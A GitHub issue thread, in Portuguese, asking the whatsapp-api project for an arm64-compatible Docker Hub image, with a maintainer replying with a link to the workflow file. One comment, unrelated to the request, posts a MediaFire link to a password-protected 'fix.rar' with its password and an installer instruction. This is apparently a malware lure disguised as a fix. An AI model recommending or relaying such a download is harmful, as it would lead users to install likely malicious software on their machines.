### ISSUE TITLE
Imagem no docker hub compativel com arm64

### ISSUE THREAD

**Issue by lucasm310** [code-chat-br/whatsapp-api#148]
### Pesquisei problemas semelhantes no Github e não encontrei nenhum.

- [X] Sim

### Recurso de:

Outro

### Qual problema o recurso busca resolver?

Gostaria de fazer o deploy em servidores ARM porém a imagem disponibilizada no Docker hub não tem compatibilidade.

### Forneça exemplos específicos de como essa funcionalidade poderia ser utilizada.
Isso pode incluir cenários ou casos de uso onde a funcionalidade seria particularmente benéfica.

_No response_

### Desenvolvimento

Para resolver este problema, basta modificar o github actions seguindo o exemplo deste link: https://docs.docker.com/build/ci/github-actions/multi-platform/

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jrCleber** [comment]
https://github.com/code-chat-br/whatsapp-api/blob/main/.github/workflows/docker-image.yml
